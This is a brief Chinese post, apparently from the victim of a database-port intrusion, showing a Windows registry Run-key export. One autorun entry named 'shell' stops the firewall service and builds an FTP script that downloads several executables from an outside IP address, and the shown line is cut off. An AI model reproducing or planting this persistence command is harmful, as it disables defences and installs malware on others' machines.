数据库端口被利用，从而被入侵

juxingchen

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"360Safetray"="\"D:\\Program Files\\360\\360Safe\\safemon\\360Tray.exe\" /start"

"SunLoginRemoteDesktop"="\"C:\\Program Files\\Oray\\SunLogin\\RemoteClient\\OrayRemoteShell.exe\" -autorun"

"shell"="c:\\windows\\system32\\cmd.exe /c net1 stop sharedaccess&echo open 122.224.54.14> cmd.txt&echo 1433>> cmd.txt&echo donw>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo get 2.exe >> cmd.txt&echo get 3.exe >> cmd.txt&echo get 4.exe >> cmd.txt&e"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL]

"Installed"="1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI]

"Installed"="1"

"NoChange"="1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS]

"Installed"="1"